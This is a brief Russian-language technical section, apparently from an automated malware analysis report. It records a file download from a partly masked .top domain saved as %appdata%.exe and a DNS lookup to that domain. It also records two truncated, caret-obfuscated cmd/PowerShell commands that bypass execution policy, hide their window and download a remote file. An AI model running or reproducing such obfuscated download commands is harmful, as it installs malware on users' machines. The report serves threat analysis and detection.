Техническая информация
- http://www.ap###styc.top/search.php?f=###### как %appdata%.exe
- DNS ASK ap###styc.top
- '<SYSTEM32>\cmd.exe' /c P^OweR^she^Ll.ex^e^ -ex^ecuti^o^N^PoL^IcY^ b^YPa^ss -noP^RoFi^le -^wind^Ow^s^t^YLe^ ^hi^ddeN ^(^N^ew^-o^Bj^ect sYste^m.N^e^t^.webc^li^eNt^).d^OwnLoadfile(^'http://www.a...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c P^OweR^she^Ll.ex^e^ -ex^ecuti^o^N^PoL^IcY^ b^YPa^ss -noP^RoFi^le -^wind^Ow^s^t^YLe^ ^hi^ddeN ^(^N^ew^-o^Bj^ect sYste^m.N^e^t^.webc^li^eNt^).d^OwnLoadfile(^'http://www.a...